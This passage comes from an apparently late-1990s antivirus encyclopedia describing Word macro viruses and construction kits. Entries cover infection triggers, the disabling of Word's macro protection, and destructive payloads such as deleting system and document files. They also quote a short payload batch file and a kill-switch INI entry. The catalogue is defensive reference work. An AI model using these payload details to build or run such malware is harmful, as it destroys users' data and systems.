  21283. Date of origin: Spring 1997
  21284. Destructive: No
  21285. Seen In-The-Wild: No
  21286. Description:
  21287.  
  21288. Mind.A (Mind.A1) is another virus that is not capable of
  21289. infecting other documents. Therefore, it is highly unlikely that
  21290. people will run into infected documents with the Mind virus.
  21291.  
  21292.  
  21293. [WORD_Mota.A]
  21294. Virus name: WORD_Mota.A
  21295. Virus Type: Word macro virus
  21296. Number of macros: 5
  21297. Encrypted: Yes
  21298. Macro names: No2, AutoExec, AutoOpen, FileExit, FileSaveAs
  21299. Size of macros: 1578 Bytes
  21300. Place of origin: Unknown
  21301. Date of origin: Spring 1997
  21302. Destructive: No
  21303. Seen In-The-Wild: No
  21304. Description:
  21305.  
  21306. Mota infects the global template when an infected document is
  21307. opened. Further documents become infected when they are saved
  21308. (FileSaveAs).
  21309.  
  21310. Upon "FileExit", Mota disables the anti-virus protection of
  21311. Microsoft Word 7.0 and the warning message before saving
  21312. the global template (normal.dot).
  21313.  
  21314. When Microsoft Word is started (AutoExec) from an infected
  21315. global template, Mota adds the following text to the active
  21316. document:
  21317.  
  21318. "   Mota grows..   "
  21319.  
  21320.  
  21321.  
  21322. [WORD_Muck.A]
  21323. Virus name: WORD_Muck.A
  21324. Virus Type: Word macro virus
  21325. Number of macros: 6
  21326. Encrypted: No
  21327. Macro names: AutoOpen, AutoNew, AutoClose, AutoExit, FileSave
  21328.              FileSaveAs
  21329. Size of macros: 5329 Bytes
  21330. Place of origin: Africa
  21331. Date of origin: Spring 1997
  21332. Destructive: No
  21333. Seen In-The-Wild: No
  21334. Description:
  21335.  
  21336. Muck infects the global template when an infected document is
  21337. opened. Further documents become infected when they are saved
  21338. (FileSave and FileSaveAs).
  21339.  
  21340. Muck is another virus that is not destructive, it just displays
  21341. the message "   Muck   " with a probability of 1/5.
  21342.  
  21343. Muck also contains a code from an ineffective macro anti-virus
  21344. solution. The macros "AutoClose", "AutoExit" and "AutoNew"
  21345. have been snatched from ScanProt.
  21346.  
  21347.  
  21348.  
  21349. [WORD_Muck.B]
  21350. Virus name: WORD_Muck.B
  21351. Virus Type: Word macro virus
  21352. Number of macros: 6
  21353. Encrypted: No
  21354. Macro names: AutoOpen, AutoNew, AutoClose, AutoExit, FileSave
  21355.              FileSaveAs
  21356. Size of macros: 2781 Bytes
  21357. Place of origin: Africa
  21358. Date of origin: Spring 1997
  21359. Destructive: No
  21360. Seen In-The-Wild: No
  21361. Description:
  21362.  
  21363. Muck.B infects the global template when an infected document
  21364. is opened. Further documents become infected when they are
  21365. saved (FileSave and FileSaveAs).
  21366.  
  21367. The main difference between this new variant and the original
  21368. Muck.A virus it that this new variant snatched other macros
  21369. from the ScanProt macro anti-virus solution (AutoClose and
  21370. AutoNew).
  21371.  
  21372. Muck.B is another virus that is not destructive, it just displays
  21373. the message "   Muck   " with a probability of 1/5.
  21374.  
  21375.  
  21376.  
  21377. [WORD_Muck.C]
  21378. Virus name: WORD_Muck.C
  21379. Virus Type: Word macro virus
  21380. Number of macros: 6
  21381. Encrypted: No
  21382. Macro names: AutoOpen, AutoNew, AutoClose, AutoExit, FileSave
  21383.              FileSaveAs
  21384. Size of macros: 4327 Bytes
  21385. Place of origin: Unknown
  21386. Date of origin: Spring 1997
  21387. Destructive: No
  21388. Seen In-The-Wild: No
  21389. Description:
  21390.  
  21391. Muck.C infects the global template when an infected document
  21392. is opened. Further documents become infected when they are
  21393. saved (FileSave and FileSaveAs).
  21394.  
  21395. The main difference between this new variant and the original
  21396. Muck.A virus it that Muck.C has some minor code changes.
  21397. The AutoClose and AutoNew macros are identical to the ones
  21398. found in Muck.B virus.
  21399.  
  21400. Muck.C is another virus that is not destructive, it just displays
  21401. the message "   Muck   " with a probability of 1/5.
  21402.  
  21403.  
  21404. [WORD_Muck.D]
  21405. Virus name: WORD_Muck.D
  21406. Virus Type: Word macro virus
  21407. Number of macros: 6
  21408. Encrypted: No
  21409. Macro names: AutoOpen, AutoNew, AutoClose, AutoExit, FileSave
  21410.              FileSaveAs
  21411. Size of macros: 1619 Bytes
  21412. Place of origin: Unknown
  21413. Date of origin: Spring 1997
  21414. Destructive: No
  21415. Seen In-The-Wild: No
  21416. Description:
  21417.  
  21418. Muck.D infects the global template when an infected document
  21419. is opened. Further documents become infected when they are
  21420. saved (FileSave and FileSaveAs).
  21421.  
  21422. The main difference between this new variant and the previous
  21423. Muck.A virus it that Muck.D has some minor code changes.
  21424. The AutoNew macro is new, while the AutoExit macro was
  21425. taken from the B variant.
  21426.  
  21427. Muck.D also exists as a Word 97 virus. It was converted
  21428. from an older version of Word (6.0 or 7.0) to Word 8.0!
  21429.  
  21430. Muck.D is another virus that is not destructive, it just displays
  21431. the message "   Muck   " with a probability of 1/5.
  21432.  
  21433.  
  21434. [WORD_Muck.E]
  21435. Virus name: WORD_Muck.E
  21436. Virus Type: Word macro virus
  21437. Number of macros: 6
  21438. Encrypted: No
  21439. Macro names: AutoOpen, AutoNew, AutoClose, AutoExit, FileSave
  21440.              FileSaveAs
  21441. Size of macros: 1648 Bytes
  21442. Place of origin: Unknown
  21443. Date of origin: Spring 1997
  21444. Destructive: No
  21445. Seen In-The-Wild: No
  21446. Description:
  21447.  
  21448. Muck.E infects the global template when an infected document
  21449. is opened. Further documents become infected when they are
  21450. saved (FileSave and FileSaveAs).
  21451.  
  21452. The main difference between this new variant and the previous
  21453. Muck.B virus it that Muck.E has some minor code changes.
  21454.  
  21455. Muck.E is another virus that is not destructive, it just displays
  21456. the message "   Muck   " with a probability of 1/5.
  21457.  
  21458.  
  21459. [WORD_NF.A (a.k.a. Names)]
  21460. Virus name: WORD_NF.A (a.k.a. Names)
  21461. Virus Type: Word macro virus
  21462. Number of macros: 2
  21463. Encrypted: Yes
  21464. Macro names: AutoClose, NF
  21465. Size of macros: 286 Bytes
  21466. Place of origin: USA
  21467. Date of origin: Summer 1996
  21468. Destructive: No
  21469. Common In-The-Wild: No
  21470. Description:
  21471.  
  21472. NF infects documents that are closed (AutoClose). Infected
  21473. documents are converted internally to templates which is very
  21474. common for macro viruses.
  21475.  
  21476. Upon infection, NF will display the following message at the
  21477. bottom of the screen:
  21478.  
  21479. "   Traced!    "
  21480.  
  21481.  
  21482. [WORD_Niceday.A]
  21483. Virus name: WORD_Niceday.A
  21484. Virus Type: Word macro virus
  21485. Number of macros: 4
  21486. Encrypted: No
  21487. Macro names: VClose, Payload, AutoExit, AutoOpen, VOpen, AutoClose
  21488. Size of macros: 886 Bytes
  21489. Place of origin: Unknown
  21490. Date of origin: Unknown
  21491. Destructive: No
  21492. Seen In-The-Wild: No
  21493. Description:
  21494.  
  21495. Niceday infects the global template (normal.dot) when an
  21496. infected file is opened.  Further documents become infected
  21497. when they are closed (AutoClose).
  21498.  
  21499. Niceday triggers every day of the year and displays the
  21500. following message:
  21501.  
  21502. "   Have a Nice Day   "
  21503.  
  21504. Niceday includes parts of the Concept virus. The "Payload"
  21505. macro is identical to the one located in the Concept.A virus.
  21506.  
  21507.  
  21508. [WORD_Niceday.B]
  21509. Virus name: WORD_Niceday.B
  21510. Virus Type: Word macro virus
  21511. Number of macros: 4
  21512. Encrypted: No
  21513. Macro names: VClose, Payload, AutoExit, AutoOpen,
  21514.              (VOpen, AutoClose)
  21515. Size of macros: 886 Bytes
  21516. Place of origin: Unknown
  21517. Date of origin: Winter 1996
  21518. Destructive: No
  21519. Seen In-The-Wild: No
  21520. Description:
  21521.  
  21522. Niceday.B infects the global template (normal.dot) when an
  21523. infected document is opened. Further documents become
  21524. infected when they are closed (AutoClose).
  21525.  
  21526. The main difference between this new variant and the previous
  21527. Niceday.A virus is that Niceday.B has some modified codes.
  21528.  
  21529.  
  21530. [WORD_Niceday.C]
  21531. Virus name: WORD_Niceday.C
  21532. Virus Type: Word macro virus
  21533. Number of macros: 4
  21534. Encrypted: No
  21535. Macro names: VClose, Payload, AutoExit, AutoOpen,
  21536.              (VOpen, AutoClose)
  21537. Size of macros: 886 Bytes
  21538. Place of origin: Unknown
  21539. Date of origin: Winter 1996
  21540. Destructive: No
  21541. Seen In-The-Wild: No
  21542. Description:
  21543.  
  21544. Niceday.C infects the global template (normal.dot) when an
  21545. infected document is opened. Further documents become
  21546. infected when they are closed (AutoClose).
  21547.  
  21548. The main difference between this new variant and the previous
  21549. Niceday.A virus is that Niceday.C has some corrupted codes.
  21550.  
  21551.  
  21552. [WORD_Niceday.D]
  21553. Virus name: WORD_Niceday.D
  21554. Virus Type: Word macro virus
  21555. Number of macros: 4
  21556. Encrypted: No
  21557. Macro names: VClose, Payload, AutoExit, AutoOpen,
  21558.              (VOpen, AutoClose)
  21559. Size of macros: 886 Bytes
  21560. Place of origin: Unknown
  21561. Date of origin: Spring 1997
  21562. Destructive: No
  21563. Seen In-The-Wild: No
  21564. Description:
  21565.  
  21566. Niceday.D infects the global template (normal.dot) when an
  21567. infected document is opened. Further documents become
  21568. infected when they are closed (AutoClose).
  21569.  
  21570. The main difference between this new variant and the previous
  21571. Niceday.A virus is that Niceday.D has a corrupted "Payload"
  21572. macro.
  21573.  
  21574.  
  21575. [WORD_Niceday.E]
  21576. Virus name: WORD_Niceday.E
  21577. Virus Type: Word macro virus
  21578. Number of macros: 4
  21579. Encrypted: No
  21580. Macro names: VClose, Payload, AutoExit, AutoOpen,
  21581.              (VOpen, AutoClose)
  21582. Size of macros: 886 Bytes
  21583. Place of origin: Unknown
  21584. Date of origin: Spring 1997
  21585. Destructive: No
  21586. Seen In-The-Wild: No
  21587. Description:
  21588.  
  21589. Niceday.E infects the global template (normal.dot) when an
  21590. infected document is opened. Further documents become
  21591. infected when they are closed (AutoClose).
  21592.  
  21593. The main difference between this new variant and the previous
  21594. Niceday.A virus is that Niceday.E has a corrupted "Payload"
  21595. and "AutoExit" macros.
  21596.  
  21597.  
  21598. [WORD_Niceday.F]
  21599. Virus name: WORD_Niceday.F
  21600. Virus Type: Word macro virus
  21601. Number of macros: 4
  21602. Encrypted: No
  21603. Macro names: VClose, Payload, AutoExit, AutoOpen,
  21604.              (VOpen, AutoClose)
  21605. Size of macros: 886 Bytes
  21606. Place of origin: Unknown
  21607. Date of origin: Spring 1997
  21608. Destructive: No
  21609. Seen In-The-Wild: Yes
  21610. Description:
  21611.  
  21612. Niceday.F infects the global template (normal.dot) when an
  21613. infected document is opened. Further documents become
  21614. infected when they are closed (AutoClose).
  21615.  
  21616. The main difference between this new variant and previous
  21617. Niceday viruses is that Niceday.F has a differently corrupted
  21618. "AutoExit" macro.
  21619.  
  21620.  
  21621. [WORD_Niceday.G]
  21622. Virus name: WORD_Niceday.G
  21623. Virus Type: Word macro virus
  21624. Number of macros: 4
  21625. Encrypted: No
  21626. Macro names: VClose, Payload, AutoExit, AutoOpen,
  21627.              (VOpen, AutoClose)
  21628. Size of macros: 910 Bytes
  21629. Place of origin: Spain
  21630. Date of origin: Spring 1997
  21631. Destructive: No
  21632. Seen In-The-Wild: No
  21633. Description:
  21634.  
  21635. Niceday.G infects the global template (normal.dot) when an
  21636. infected document is opened. Further documents become
  21637. infected when they are closed (AutoClose).
  21638.  
  21639. The main difference between this new variant and previous
  21640. Niceday viruses is that Niceday.G has a different message.
  21641. It displays " Pepe Truene, The mooooooooore Faster" instead
  21642. of " Have a NiceDay!".
  21643.  
  21644. Niceday.G also has an additional comment in the "AutoClose"
  21645. macro.
  21646.  
  21647.  
  21648. [WORD_Niceday.H]
  21649. Virus name: WORD_Niceday.H
  21650. Virus Type: Word macro virus
  21651. Number of macros: 4
  21652. Encrypted: No
  21653. Macro names: VClose, Payload, AutoExit, AutoOpen,
  21654.              (VOpen, AutoClose)
  21655. Size of macros: 886 Bytes
  21656. Place of origin: Unknown
  21657. Date of origin: Spring 1997
  21658. Destructive: No
  21659. Seen In-The-Wild: No
  21660. Description:
  21661.  
  21662. Niceday.H infects the global template (normal.dot) when an
  21663. infected document is opened. Further documents become
  21664. infected when they are closed (AutoClose).
  21665.  
  21666. The main difference between this new variant and previous
  21667. Niceday viruses is that Niceday.H has a differently corrupted
  21668. "Payload" macro.
  21669.  
  21670.  
  21671. [WORD_Niceday.I]
  21672. Virus name: WORD_Niceday.I
  21673. Virus Type: Word macro virus
  21674. Number of macros: 4
  21675. Encrypted: No
  21676. Macro names: VClose, Payload, AutoExit, AutoOpen,
  21677.              (VOpen, AutoClose)
  21678. Size of macros: 886 Bytes
  21679. Place of origin: Unknown
  21680. Date of origin: Spring 1997
  21681. Destructive: No
  21682. Seen In-The-Wild: No
  21683. Description:
  21684.  
  21685. Niceday.I infects the global template (normal.dot) when an
  21686. infected document is opened. Further documents become
  21687. infected when they are closed (AutoClose).
  21688.  
  21689. The main difference between this new variant and previous
  21690. Niceday viruses is that Niceday.I has some differently
  21691. corrupted macros.
  21692.  
  21693.  
  21694. [WORD_Niceday.J]
  21695. Virus name: WORD_Niceday.J
  21696. Virus Type: Word macro virus
  21697. Number of macros: 4
  21698. Encrypted: No
  21699. Macro names: VClose, Payload, AutoExit, AutoOpen,
  21700.              (VOpen, AutoClose)
  21701. Size of macros: 886 Bytes
  21702. Place of origin: Unknown
  21703. Date of origin: Spring 1997
  21704. Destructive: No
  21705. Seen In-The-Wild: No
  21706. Description:
  21707.  
  21708. Niceday.J infects the global template (normal.dot) when an
  21709. infected document is opened. Further documents become
  21710. infected when they are closed (AutoClose).
  21711.  
  21712. The main difference between this new variant and previous
  21713. Niceday viruses is that Niceday.J has a differently
  21714. corrupted "Payload" macro.
  21715.  
  21716.  
  21717. [WORD_Niceday.K]
  21718. Virus name: WORD_Niceday.K
  21719. Virus Type: Word macro virus
  21720. Number of macros: 4
  21721. Encrypted: No
  21722. Macro names: VClose, Payload, AutoExit, AutoOpen,
  21723.              (VOpen, AutoClose)
  21724. Size of macros: 886 Bytes
  21725. Place of origin: Unknown
  21726. Date of origin: June 1997
  21727. Destructive: No
  21728. Seen In-The-Wild: No
  21729. Description:
  21730.  
  21731. Niceday.K infects the global template (normal.dot) when an
  21732. infected document is opened. Further documents become
  21733. infected when they are closed (AutoClose).
  21734.  
  21735. The main difference between this new variant and previous
  21736. Niceday viruses is that Niceday.K has a differently
  21737. corrupted "AutoExit" macro.
  21738.  
  21739.  
  21740. [WORD_Niceday.L]
  21741. Virus name: WORD_Niceday.L
  21742. Virus Type: Word macro virus
  21743. Number of macros: 4
  21744. Encrypted: No
  21745. Macro names: VClose, Payload, AutoExit, AutoOpen,
  21746.              (VOpen, AutoClose)
  21747. Size of macros: 909 Bytes
  21748. Place of origin: Unknown
  21749. Date of origin: June 1997
  21750. Destructive: No
  21751. Seen In-The-Wild: No
  21752. Description:
  21753.  
  21754. Niceday.L infects the global template (normal.dot) when an
  21755. infected document is opened. Further documents become
  21756. infected when they are closed (AutoClose).
  21757.  
  21758. The main difference between this new variant and the previous
  21759. Niceday.D virus is that Niceday.L has a different message.
  21760. It displays " Your files will be deleted in 24 hours " instead
  21761. of " Have a NiceDay!".
  21762.  
  21763.  
  21764. [WORD_Niki.A]
  21765. Virus name: WORD_Niki.A
  21766. Virus Type: Word macro virus
  21767. Number of macros: 6
  21768. Encrypted: Yes
  21769. Macro names: AutoExec, AutoOpen, FileApri, FileSalvaConNome,
  21770.              StrumMacro, NiKi
  21771. Size of macros: 7939 Bytes
  21772. Place of origin: Italy
  21773. Date of origin: Unknown
  21774. Destructive: Yes
  21775. Seen In-The-Wild: No
  21776. Description:
  21777.  
  21778. Niki is another macro virus for the Italian version of Microsoft
  21779. Word.
  21780.  
  21781. Niki infects the global template (normal.dot) when an infected
  21782. document is opened.  Further documents become infected
  21783. when they are opened (FileApri) and saved (FileSalvaConNome).
  21784.  
  21785. When the "NiKi" macro is activated, Niki deletes all .doc files
  21786. and all .dll files in the following directories:
  21787.  
  21788. C:\MSOFFICE
  21789. C:\WINDOWS\SYSTEM
  21790.  
  21791.  
  21792. [WORD_Nikita.A and WORD_Nikita.A1]
  21793. Virus name: WORD_Nikita.A and WORD_Nikita.A1
  21794. Virus Type: Word macro virus
  21795. Number of macros: 2 or 1
  21796. Encrypted: Yes
  21797. Macro names: AutoOpen, Fun
  21798. Size of macros: 1028 Bytes in .doc files
  21799.                 309 Bytes in global template
  21800. Place of origin: Unknown
  21801. Date of origin: Unknown
  21802. Destructive: Yes
  21803. Seen In-The-Wild: No
  21804. Description:
  21805.  
  21806. Nikita is a trojan, not a virus. It does not replicate.
  21807.  
  21808. Nikita activates when an infected document is opened. It
  21809. displays a face, with moving eyes and mouth, and the
  21810. following text:
  21811.  
  21812. "   Hello Guys! Oh, please stay here and look!   "
  21813.  
  21814. (the text is only available in the original trojanized document)
  21815.  
  21816. Upon activation, the "Fun" macro is saved in the global
  21817. template under the name "AutoOpen". Once a new document is opened
  21818. (from an infected document) the payload triggers and Nikita creates
  21819. files, slowly filling the hard drive. The files contain the
  21820. following text:
  21821.  
  21822. "   Nikita (1997) Nightmare Joker [SLAM]   "
  21823.  
  21824.  
  21825. [WORD_NJ-WMDLK1.A (a.k.a. BlackKnight)]
  21826. Virus name: WORD_NJ-WMDLK1.A (a.k.a. BlackKnight)
  21827. Virus Type: Word macro virus
  21828. Number of macros: 2
  21829. Encrypted: Yes
  21830. Macro names: DQEQDIDT, GPDRCQJZ
  21831. Size of macros: 3680 Bytes
  21832. Place of origin: Unknown
  21833. Date of origin: Unknown
  21834. Destructive: No
  21835. Seen In-The-Wild: No
  21836. Description:
  21837.  
  21838. NJ-WMDLK1.A infects the global template (normal.dot) when
  21839. an infected document is opened and the following key is
  21840. pressed:
  21841.  
  21842. "   SPACE   " assigned to the DQEQDIDT macro
  21843.  
  21844. Further documents become infected when " SPACE " is pressed
  21845. again.
  21846.  
  21847. NJ-WMDLK1.A is very obvious to the user. Whenever
  21848. " SPACE " is pressed, the letter " E " will appear and when
  21849. " E " is pressed, an empty space (spacebar function) will
  21850. appear.
  21851.  
  21852. This virus was distributed with NJ-WMDLK1.B and
  21853. NJ-WMDLK1.C inside a macro virus construction kit.
  21854. The kit is available in 5 different versions and is capable
  21855. of creating macro viruses and macro trojans.
  21856.  
  21857.  
  21858. [WORD_NJ-WMDLK1.B (a.k.a. BlackEnd)]
  21859. Virus name: WORD_NJ-WMDLK1.B (a.k.a. BlackEnd)
  21860. Virus Type: Word macro virus
  21861. Number of macros: 5
  21862. Encrypted: Yes
  21863. Macro names: AutoNew, AutoClose, AutoExec, AutoOpen, BlackEnd
  21864. Size of macros: 2102 Bytes
  21865. Place of origin: Unknown
  21866. Date of origin: Unknown
  21867. Payload: Yes
  21868. Seen In-The-Wild: No
  21869. Description:
  21870.  
  21871. NJ-WMDLK1.B infects the global template (normal.dot) when
  21872. an infected document is opened. Further documents become
  21873. infected when they are also opened (AutoOpen), closed
  21874. (AutoClose), Microsoft Word started (AutoExec), and when
  21875. a new file is created (AutoNew).
  21876.  
  21877. On May 22nd of each year, Nj-WMDLK1.B activates its
  21878. payload and inserts the following text to a newly created
  21879. template:
  21880.  
  21881. "   You are infected with the BlackEbd Virus! [D.K.]
  21882.  
  21883. After that is creates the following batch file and launches it:
  21884.  
  21885.  C:\DOSSYS.BAT
  21886.  
  21887. The file contains the following:
  21888.  
  21889. "   echo off   "
  21890. "   doskey Fun=setver win.com 3.00   "
  21891. "   echo off   "
  21892. "   Fun   "
  21893.  
  21894. This virus was distributed with NJ-WMDLK1.A and
  21895. NJ-WMDLK1.C inside a macro virus construction kit. The kit
  21896. is available in 5 different versions and is capable of creating
  21897. macro viruses and macro trojans.
  21898.  
  21899.  
  21900. [WORD_NJ-WMVCK2.B (Kit) (a.k.a. NJK-gen)]
  21901. Virus Kit Name: WORD_NJ-WMVCK2.B (Kit) (a.k.a. NJK-gen)
  21902. Virus Type: Word macro virus
  21903. Size of macros: 264915 Bytes
  21904. Number of macros: 20
  21905. Place of origin: Germany
  21906. Date of origin: July 1996
  21907. Description:
  21908.  
  21909. This macro virus construction kit was the first one to appear
  21910. during the Summer of 1996. It was written in Germany and only
  21911. works with the German version of Microsoft Word.
  21912.  
  21913. All viruses, created with the kit, have the following common
  21914. characteristics:
  21915.  
  21916. 1. Consist of 7 or 8 macros
  21917.  
  21918. 2. 7 macros have fixed names
  21919.  
  21920. 3. Last macro name is chosen by the user
  21921.  
  21922. The kit offers to drop 9 predefined DOS-based viruses upon
  21923. activation. Due to a bug in the macro code only the dropper
  21924. for the BOZA.C virus works. Boza.C is classified as an
  21925. intended virus and does not infect any user files. However,
  21926. the chance of corruption still exists.
  21927.  
  21928. All the viruses check the system time and if the value of the
  21929. second field is 10, the following text is added to the printed
  21930. document:
  21931.  
  21932. "   Nightmare Joker's WMVCK   "
  21933.  
  21934. The construction kit also offers to add some additional text to
  21935. the printed document. The construction kit user only needs to
  21936. type in the text when creating the virus.
  21937.  
  21938. Below are the viruses that can be created with the kit:
  21939.  
  21940. 1.  WMVCK.Casino  - This variant will drop Casino.2330.
  21941.  
  21942. 2.  WMVCK.VLS     - This variant will drop VCL.Markt.1533.
  21943.  
  21944. 3.  WMVCK.MTE     - This variant will drop MTE.Shocker.
  21945.  
  21946. 4.  WMVCK.Sirius  - This variant will drop Sirius.Alive.4608.
  21947.  
  21948. 5.  WMVCK.SMEG    - This variant will drop SMEG.Queeg.
  21949.  
  21950. 6.  WMVCK.Tequila - This variant will drop Tequila.
  21951.  
  21952. 7.  WMVCK.VICE    - This variant will drop VICE.05.Code.3952.
  21953.  
  21954. 8.  WMVCK.Uniform - This variant will drop Uniform.
  21955.  
  21956. 9.  WMVCK.Boza.C  - This variant will drop Boza.
  21957.  
  21958. 10. WMVCK.Tremor  - This variant will drop Tremor.
  21959.  
  21960. 11. WMVCK.NoDrop  - This variant will not drop any virus.
  21961.  
  21962.  
  21963. [WORD_NJ-WMDLK1.C (a.k.a. Grunt)]
  21964. Virus name: WORD_NJ-WMDLK1.C (a.k.a. Grunt)
  21965. Virus Type: Word macro virus
  21966. Number of macros: 2
  21967. Encrypted: Yes
  21968. Macro names: XxGRUNTxX1, XxGRUNTxX2
  21969. Size of macros: 1461 Bytes
  21970. Place of origin: Unknown
  21971. Date of origin: Unknown
  21972. Destructive: No
  21973. Seen In-The-Wild: No
  21974. Description:
  21975.  
  21976. NJ-WMDLK1.C infects the global template (normal.dot) when
  21977. an infected document is opened and one of the following keys
  21978. is pressed:
  21979.  
  21980. "   E   "  assigned to the XxGRUNTxX1 macro
  21981. "   I   "  assigned to the XxGRUNTxX2 macro
  21982.  
  21983. Further documents become infected when again " E " or " I " is
  21984. pressed.
  21985.  
  21986. The following text can be found inside the virus:
  21987.  
  21988. "   A Virus from Nightmare Joker's Demolition Kit!   "
  21989.  
  21990. This virus was distributed with NJ-WMDLK1.A and
  21991. NJ-WMDLK1.B inside a macro virus construction kit. The kit
  21992. is available in 5 different versions and is capable of creating
  21993. macro viruses and macro trojans.
  21994.  
  21995.  
  21996.  
  21997. [WORD_NJ-WMDLK1.D (a.k.a. Archie)]
  21998. Virus name: WORD_NJ-WMDLK1.D (a.k.a. Archie)
  21999. Virus Type: Word macro virus
  22000. Number of macros: 5
  22001. Encrypted: Yes
  22002. Macro names: AutoNew, AutoClose, AutoExec, AutoOpen, BlackEnd
  22003. Size of macros: 2102 Bytes
  22004. Place of origin: Unknown
  22005. Date of origin: Unknown
  22006. Payload: No
  22007. Seen In-The-Wild: No
  22008. Description:
  22009.  
  22010. NJ-WMDLK1.D infects the global template (normal.dot) when
  22011. an infected document is opened. Further documents become
  22012. infected when they are also opened (AutoOpen), closed
  22013. (AutoClose), Microsoft Word started (AutoExec), and when a
  22014. new file is created (AutoNew).
  22015.  
  22016. This virus is another virus created with a macro virus
  22017. construction kit. The original kit is available in 5 different
  22018. versions and is capable of creating macro viruses and
  22019. macro trojans.
  22020.  
  22021. The following text can be found in the "Archie" macro:
  22022.  
  22023. " A Virus from Nightmare Joker's Demolition Kit!   "
  22024. " Translated into English by Dark Night (VBB)   "
  22025.  
  22026.  
  22027. [WORD_Nomvir.A:De]
  22028. Virus name: WORD_Nomvir.A:De
  22029. Virus Type: Word macro virus
  22030. Number of macros: 10
  22031. Encrypted: Yes
  22032. Macro names: AutoExec, AutoNew, AutoOpen, DateiSpeichern,
  22033.              DateiSpeichernUnter, DateiBeenden, ExtrasOptionen,
  22034.              DateiDokvorlagen, DateiDrucken, FuckIt,
  22035. Size of macros: 5660 Bytes
  22036. Place of origin: Germany
  22037. Date of origin: January 1997
  22038. Payload: Yes
  22039. Seen In-The-Wild: No
  22040. Description:
  22041.  
  22042. Nomvir infects the global template (normal.dot) when a new
  22043. document is created (AutoNew) or Microsoft Word is started
  22044. (AutoExec).  Further documents become infected when they
  22045. are saved with the DateiSpeichern or DateiSpeichernUnter
  22046. command.
  22047.  
  22048. Nomvir includes various destructive payloads. It tries to
  22049. replace words with the word "hell", deletes C:\Autoexec.bat
  22050. and C:\Config.sys, or adds the following text at the end of a
  22051. document:
  22052.  
  22053. "   Fuck Microsoft & Bill Gates   "
  22054.  
  22055. Other payloads are activated on the 23rd of each month,
  22056. Saturday 13th, January 1st and December 25th.
  22057. On these days it tries to delete the following files:
  22058.  
  22059. "   C:\WINDOWS\USER.DAT   "
  22060. "   C:\WINDOWS\USER.DA0   "
  22061. "   C:\WINDOWS\SYSTEM.DA0   "
  22062. "   C:\WINDOWS\SYSTEM.DAT   "
  22063.  
  22064. Novir.A does not activate its payloads if it finds the following
  22065. entry in the "Compatibility" section of WINI.INI:
  22066.  
  22067. Nomvir=0x0690690"
  22068.  
  22069. The following message is displayed when the Tools/Macro
  22070. menu is selected:
  22071.  
  22072. "   Nicht genⁿgend Arbeitsspeicher !   "
  22073.  
  22074. (translated: Not enough memory)
  22075.  
  22076. Another message is displayed when the "DateiDokvorlagen"
  22077. menu is selected:
  22078.  
  22079. "   Interner Fehler !   "
  22080.  
  22081. (translated: Internal Error)
  22082.  
  22083.  
  22084. [WORD_Nomvir.B:De]
  22085. Virus name: WORD_Nomvir.B:De
  22086. Virus Type: Word macro virus
  22087. Number of macros: 10
  22088. Encrypted: Yes
  22089. Macro names: AutoExec, AutoNew, AutoOpen, DateiSpeichern,
  22090.              DateiSpeichernUnter, DateiBeenden, ExtrasOptionen,
  22091.              DateiDokvorlagen, DateiDrucken, FuckIt,
  22092. Size of macros: 5660 Bytes
  22093. Place of origin: Germany
  22094. Date of origin: January 1997
  22095. Payload: Yes
  22096. Seen In-The-Wild: No
  22097. Description:
  22098.  
  22099. Nomvir.B infects the global template (normal.dot) when a new
  22100. document is created (AutoNew) or Microsoft Word is started
  22101. (AutoExec).  Further documents become infected when they
  22102. are saved with the DateiSpeichern or DateiSpeichernUnter
  22103. command.
  22104.  
  22105. The main difference between this new variant and the "A"
  22106. variant is that the "DateiDrucken" and "DateiBeenden"
  22107. macros are not corrupted anymore.
  22108.  
  22109. DateiBeenden (translated: FileClose) is responsible for another
  22110. new payload. With a chance of 20 percent, Nomvir.B adds a
  22111. password to the active document. This password is made up of 5
  22112. characters (iATeS) and another 6th character that is randomly chosen.
  22113.  
  22114. For more information, please refer to the Nomvir.A virus
  22115. description.
  22116.  
  22117.  
  22118. [WORD_Nop.A:De]
  22119. Virus name: WORD_Nop.A:De
  22120. Virus Type: Word macro virus
  22121. Number of macros: 2
  22122. Encrypted: No
  22123. Macro names: AutoOpen, NOP (DateiSpeichern)
  22124. Size of macros: 246 Bytes
  22125. Place of origin: Germany
  22126. Date of origin: Summer 1996
  22127. Destructive: No
  22128. Common In-The-Wild: Yes
  22129. Description:
  22130.  
  22131. NOP.A is a very primitive virus and has only very few necessary
  22132. commands in order to replicate. The only special characteristic
  22133. for the NOP virus is that it turns off the prompting of Word
  22134. before saving the global template (NORMAL.DOT).
  22135.  
  22136. When an infected document is opened, NOP transfers itself to
  22137. the global template and renames "NOP" into "DateiSpeichern".
  22138. Additional documents become infected when they are saved.
  22139.  
  22140.  
  22141. [WORD_Nop.B:De]
  22142. Virus name: WORD_Nop.B:De
  22143. Virus Type: Word macro virus
  22144. Number of macros: 2
  22145. Encrypted: No
  22146. Macro names: AutoOpen, NOP (DateiSpeichern)
  22147. Size of macros: 250 Bytes
  22148. Place of origin: Germany
  22149. Date of origin: Summer 1996
  22150. Destructive: No
  22151. Common In-The-Wild: No
  22152. Description:
  22153.  
  22154. The difference between the this new variant and NOP.A is that
  22155. NOP.B does not turn off the prompting of Microsoft Word
  22156. before saving the global template (normal.dot). It also enters
  22157. the word "Testvirus" at the insertion point.
  22158.  
  22159. For more information, please refer to the NOP.A virus.
  22160.  
  22161.  
  22162. [WORD_NOP.D]
  22163. Virus name: WORD_NOP.D
  22164. Virus Type: Word macro virus
  22165. Number of macros: 1
  22166. Encrypted: No
  22167. Macro names: AutoOpen, NOP
  22168. Size of macros: 234 Bytes
  22169. Place of origin: USA
  22170. Date of origin: January 1997
  22171. Destructive: No
  22172. Common In-The-Wild: No
  22173. Description:
  22174.  
  22175. NOP.D is a new variant based on the original Nop.A virus.
  22176. The only difference between the two viruses is that NOP.D is
  22177. able to infect the English version of Microsoft Word, while
  22178. NOP.A only works with the German version.
  22179.  
  22180. For more information, please refer to the NOP.A virus.
  22181.  
  22182. [WORD_NPad.A (DOEUNPAD)]
  22183. Virus name: WORD_NPad.A (DOEUNPAD)
  22184. Virus Type: Word macro virus
  22185. Number of macros: 1
  22186. Encrypted: Yes
  22187. Macro names: AutoOpen
  22188. Size of macros: 1831 Bytes
  22189. Place of origin: Bandung, Indonesia
  22190. Date of origin: March 1996
  22191. Payload: Yes
  22192. Common In-The-Wild: Yes
  22193. Description:
  22194.  
  22195. NPad activates when an infected document is opened
  22196. (AutoOpen).
  22197.  
  22198. NPad.A also modifies the "compatibility" section inside the
  22199. WIN.INI file. It adds a counter under the name of "NPAD328"
  22200. and each time the virus is activated, it adds 1 to its value.
